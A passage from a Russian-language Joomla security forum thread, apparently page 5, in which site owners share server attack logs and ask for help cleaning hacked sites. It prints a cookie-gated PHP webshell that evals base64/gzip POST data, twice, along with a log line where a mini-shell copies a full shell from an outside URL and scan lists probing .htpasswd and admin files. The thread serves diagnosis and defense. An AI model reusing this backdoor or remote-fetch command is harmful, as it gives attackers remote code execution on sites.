Компоненты и скрипты для защиты сайта. Логи атак на сайты - страница 5 - Безопасность сайтов на Joomla

Свежий улов. Что-то новое.


Как и в прошлый раз новых файлов по заданным адресам нет.

Свежие логи

Доброго всем времени суток!
После того как поймал себе вирусов на несколько сайтов с CMS Joomla, поставил плагин jhackguard
Получил первый лог на одном из сайтов, подскажите что вот это означает:

ничего не понимаю. у меня видно что кто-то подбирает пароли к админке ежедневно, но ни jhackguard , ни Marco's SQL Injection никаких сообщений не выдает, хотя настройки такие же как на рисунках.

Доброго всем времени суток!
Знатоки, подскажите, пожалуйста, что это подбор пароля?

Многократный вызов подобных функций: сайт/public_html/
/function%20forEach()%20{%20[native%20code]%20}
/function(){return%20this[$random(0,this.length-1)]||null
/function(){var%20red=this[0],green=this[1],blue=this[2]
/function(array){if(this.length%3C3)return%20false
/function(array){if(this.length!=3)return%20false
/function(){return%20this[this.length-1]||null
/_vti_bin/owssvr.dll
/function(start,length){start=start||0
/function(array){for(var%20i=0,j=array.length
/function(array){for(var%20i=0,l=array.length
/function(keys){var%20obj={},length=Math.min(this.length,keys.length)
/function(item,from){return%20this.indexOf(item,from)!=-1
/function(item){var%20i=0
/function(item){if(!this.contains(item))this.push(item)

 Несколько часов уже отправляется на выполнение такой скрипт, в ответ File does not exist
Пока этот IP заблокировала, но в след. раз будет новый...
Чем это грозит и как с этим бороться?

Свежий улов


Такого еще не было.

Добрый день.

Ежедневно в логах масса интересных записей, но первый раз увидел такое:


Что пытаются сделать с помошью компонента com_mailto?

Добавил позже:
Была похожая дырка с SQL-инъекцией: http://sebug.net/vuldb/ssvid-17893
Обсуждение похожей дыры: http://joomlaforum.ru/index.php/topic,131090.0.html

В данном случае выяснил, что идет просто перебор ссылок "отправить по e-mail" у каждого материала.

Здравствуйте, уважаемые Форумчане. У меня проблема следующая - хостинг сообщил, что с моего аккаунта осуществляется рассылка спама, закрыл доступ к отправке писем с сервера и предложил проанализировать логи. Честно признаюсь, что я анализирую логи впервые. Почитав различные форумы и посты на эту тему, пришёл к выводу, что нужно искать нечто необычное и в особенности логи, содержащие слово POST. Как я понимаю GET – означает, что пользователь просто просмотрел страницу сайта, а POST – как раз означает загрузку какого либо файла.
Мне показались подозрительными логи:
pgs-expert.ru 94.242.233.75 - - [04/Feb/2013:03:24:40 +0400] "POST /plugins/editors/jce/tiny_mce/plugins/print/2d6fc353.php HTTP/1.0" 200 224 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10"
pgs-expert.ru 94.242.233.75 - - [29/Jan/2013:16:00:31 +0400] "POST /images/stories/oobrmr.php HTTP/1.0" 200 44 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"

При этом загруженные файлы содержат одинаковый код:

<?php
if(!empty($_COOKIE['__utma']) and substr($_COOKIE['__utma'],0,16)=='3469825000034634'){
if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
  echo '<textarea id=areatext>';
  eval($msg);
  echo '</textarea>bg';
  exit;
}}
?>

Вопросы:
1.   Являются ли эти файлы вирусными, и могла ли с помощью них выполнятся рассылку спама? Могу ли я удалив данные файлы, сообщить хостингу, что проблема решена и чтобы он открыл доступ к отправке писем с сервера.
2.   Как выявить уязвимость, через которую были загружены файла 2d6fc353.php и oobrmr.php? Существует ли какой ни будь простой и надёжный способ защиты сайтов?

JCE стоит? в папке images по определению нет php файлов, это вредоносные скрипты.

Спасибо.
Я так понимаю, JCE - редактор контента для Joomla!... Тогда JCE у меня не установлено, стандартный редактор

wishlight, может быть Вы посмотрите мой сайт, устраните уязвимости через которые были загружены вредоносные файлы. Сколько такая услуга стоит? Могу выслать логи и другую необходимую информацию, скажите куда?

на подбор пароля

можно поинтересоваться что за хост, просто есть мысль, и хочу утвердить её

Кстати, адрес 213.171.204.130 засветился и у меня в логах, уже неделю подряд каждый день что-то там пытается сделать.

Кстати, адрес 213.171.204.130 засветился и у меня в логах, уже неделю подряд каждый день что-то там пытается сделать.

IP Ban никто не отменял...

Мне показались подозрительными логи:
pgs-expert.ru 94.242.233.75 - - [04/Feb/2013:03:24:40 +0400] "POST /plugins/editors/jce/tiny_mce/plugins/print/2d6fc353.php HTTP/1.0" 200 224 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10"
pgs-expert.ru 94.242.233.75 - - [29/Jan/2013:16:00:31 +0400] "POST /images/stories/oobrmr.php HTTP/1.0" 200 44 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"

При этом загруженные файлы содержат одинаковый код:

<?php
if(!empty($_COOKIE['__utma']) and substr($_COOKIE['__utma'],0,16)=='3469825000034634'){
if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
  echo '<textarea id=areatext>';
  eval($msg);
  echo '</textarea>bg';
  exit;
}}
?>

Аналогичная фигня:
- В логах сервера появилась масса строк типа:
     217.112.35.87 сайт.ru - [25/Feb/2013:23:11:33 +0400] "GET /components/com_morfeoshow/tpl/resources/fancy/ea85dfa.php HTTP/1.1" 200 14 "-" "-"
     217.112.35.87 сайт.ru - [25/Feb/2013:23:11:33 +0400] "GET /plugins/content/sigplus/engines/slimbox2/deb2330.php HTTP/1.1" 200 14 "-" "-"
     217.112.35.87 сайт.ru - [25/Feb/2013:23:11:33 +0400] "GET /language/tr-TR/6717.php HTTP/1.1" 200 14 "-" "-"
- Перестали работать некоторые скрипты (JS были дополнены большим количеством ";;;;;;;;;;;;;" )
- В процессе загрузки страниц в статусе мелькали левые ссылки

Все левые файлы вычистил, меры безопасности из здесь обсуждавшихся предпринял. Сейчас сайт работает нормально, но Айболит ругается "Найдены сигнатуры шелл-скрипта. Подозрение на вредоносный скрипт":

/modules/mod_junewsultra/img/img.php
p_key = $_GET['src']; $srcurl = $_GET['src']; $imgurl = |base64_decode($_GET['src']); $imgurl = split("&", $imgurl); $imgloa

/libraries/tcpdf/tcpdf.php
bscissa of end point. * @param float $y3 Ordinate of end point. * @access pr|ivate * @since 2.1.000 (2008-01-08) */ function _outCurve($x1, $y1, $x2,

/plugins/system/legacy/functions.php
se 2: echo "<script>$action</script> \n"; break; case 1: default: |echo "<script>alert('$text'); $action</script> \n"; echo '<noscript>'; ec

Интересно: 1 - что это было? 2 - что делать с последними приведёнными кодами и их содержащими файлами?

Аналогичная фигня:
- В логах сервера появилась масса строк типа:
     217.112.35.87 сайт.ru - [25/Feb/2013:23:11:33 +0400] "GET /components/com_morfeoshow/tpl/resources/fancy/ea85dfa.php HTTP/1.1" 200 14 "-" "-"
     217.112.35.87 сайт.ru - [25/Feb/2013:23:11:33 +0400] "GET /plugins/content/sigplus/engines/slimbox2/deb2330.php HTTP/1.1" 200 14 "-" "-"
     217.112.35.87 сайт.ru - [25/Feb/2013:23:11:33 +0400] "GET /language/tr-TR/6717.php HTTP/1.1" 200 14 "-" "-"
- Перестали работать некоторые скрипты (JS были дополнены большим количеством ";;;;;;;;;;;;;" )
- В процессе загрузки страниц в статусе мелькали левые ссылки

Все левые файлы вычистил, меры безопасности из здесь обсуждавшихся предпринял. Сейчас сайт работает нормально, но Айболит ругается "Найдены сигнатуры шелл-скрипта. Подозрение на вредоносный скрипт":

/modules/mod_junewsultra/img/img.php
p_key = $_GET['src']; $srcurl = $_GET['src']; $imgurl = |base64_decode($_GET['src']); $imgurl = split("&", $imgurl); $imgloa

/libraries/tcpdf/tcpdf.php
bscissa of end point. * @param float $y3 Ordinate of end point. * @access pr|ivate * @since 2.1.000 (2008-01-08) */ function _outCurve($x1, $y1, $x2,

/plugins/system/legacy/functions.php
se 2: echo "<script>$action</script> \n"; break; case 1: default: |echo "<script>alert('$text'); $action</script> \n"; echo '<noscript>'; ec

Интересно: 1 - что это было? 2 - что делать с последними приведёнными кодами и их содержащими файлами?

Полность можите выложить код приведенных файлов?

Полность можите выложить код приведенных файлов?

Вот первый (/modules/mod_junewsultra/img/img.php), но, по-моему тут чисто:

Второй - 230кб, большой, пока не буду класть, это, кажется, из файлов системы.
Третий, по-моему, ложное срабатывание.

... И ещё, у меня касперский не даёт даже толком просмотреть эту страницу форума - кричит "троян!". Видимо, из-за приведённого в предыдущих постах кода

Имеется свежий лог сканирования на не-Joomla уязвимости. Могу выложить, если кому интересно.

Имеется свежий лог сканирования на не-Joomla уязвимости. Могу выложить, если кому интересно.

Выкладывай! мне интиресно!

Лог сканирования на уязвимости (не_Joomla)

[вложение удалено Администратором]

Лог сканирования на уязвимости (не_Joomla)

Это вас не на уязвимости сканировали, это на наличие каталогов вас сканировали, обычным сканером директорий!

Ага, конечно. Это всё сплошь каталоги

/home/public_html/admincontrol.asp
/home/public_html/admincontrol.php
/home/public_html/adminka.php
/home/public_html/install_.php
/home/public_html/.htconfig
/home/public_html/about.php
/home/public_html/admin_.php
/home/public_html/.htaccess
/home/public_html/admins.php
/home/public_html/_update.php
/home/public_html/admincontrol.asp
/home/public_html/.htpasswd
/home/public_html/download.php
... и т.д.

Ага, конечно. Это всё сплошь каталоги

ну если вам широкомоштабно разкрыть эту тему? то и файлы, в данном примере админские, сканируют обычно на такие вещи тогда, когда вытенули логин и пасс, переходят на следущий этап, поиска того куда можно их засунуть! для этого и используют сканер директорий в который также и входит списочик файлов (админские тоже!), который помогает оприделить структуру CMS или самописа, и облегчить себе поиски самой админки! но это не сканирование на уязвимости! я нормально ответил?!

я нормально ответил?!

Нет. Но пережёвывать это дальше я не собираюсь.

Ребята, помогите разобраться где дыра в сайтах. Второй раз заливают шеллы, в первый раз вроде все почистил, сегодня заметил опять левые PHP файлы. Снова почистил.
Анализирую логи сервера, все похоже началось с этого:

178.170.123.135 - - [15/Mar/2013:11:47:13 +0200] "GET /language/en-GB/en_GB.php?en=copy('http://www.astp.net/cache/test/cachea.txt','maimeta.php'); HTTP/1.0" 200 157 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/25.0.1364.152 Safari/537.22" 

Обьясните что сие значит. Если нужно могу весь файл скинуть, может и раньше что то было.
С меня пиво)))

Ребята, помогите разобраться где дыра в сайтах. Второй раз заливают шеллы, в первый раз вроде все почистил, сегодня заметил опять левые PHP файлы. Снова почистил.
Анализирую логи сервера, все похоже началось с этого:

Обьясните что сие значит. Если нужно могу весь файл скинуть, может и раньше что то было.
С меня пиво)))

Это выполнение PHP копирование через мини шелл, заливка полноценного шелла! тут ваш сайт надо анализировать на сторонние дыры!

Ребята, помогите разобраться где дыра в сайтах.

Какая версия Joomla и что из расширений (плагины-модули-компоненты) установлено дополнительно?
В "чистой" Joomla 1.0.X, 1.5.x, 2.5.Х нет файла /language/en-GB/en_GB.php. Там явно "дырка".

Возможные варианты:
1. "дырку" эту сам себе установил с каким-то расширением (более вероятно) или даже с самой Joomla, если скачал её в сомнительном месте.
2. Это, всё-таки, было не "начало", и файл en_GB.php тебе залили раньше, хорошо замаскировав.

Вот блин, действительно такого же файла там быть не должно...Спасибо за наводку.
Смотрю этот файл - содержание один-в-один с en-gb
XML и дата изменения сама поздняя из всех найденных мною файлов. Видимо его содержание потерли в конце работы...

По Joomla - стоит 1.5.21 и 1.5.26. Грешу на JCE который был установлен и не обновлен вовремя на одном из сайтов.

Видимо в первый раз не все зачистил, где то оставил шелл. Во второй раз по логам видно, что шли обращения и к старым потертым файлам.
Только не пойму почему во второй раз взломщик так мало сделал?))
Залил все пару файлов, и никакого постороннего кода в .js и php.?
Проверяет заметили ли админы?

Вот блин, действительно такого же файла там быть не должно...Спасибо за наводку.
Смотрю этот файл - содержание один-в-один с en-gb
XML и дата изменения сама поздняя из всех найденных мною файлов. Видимо его содержание потерли в конце работы...
может просто доры залил? проверте... или какую нить биржу ссылок!
По Joomla - стоит 1.5.21 и 1.5.26. Грешу на JCE который был установлен и не обновлен вовремя на одном из сайтов.

Видимо в первый раз не все зачистил, где то оставил шелл. Во второй раз по логам видно, что шли обращения и к старым потертым файлам.
Только не пойму почему во второй раз взломщик так мало сделал?))
Залил все пару файлов, и никакого постороннего кода в .js и php.?
Проверяет заметили ли админы?

может просто доры залил? проверте... или какую нить биржу ссылок!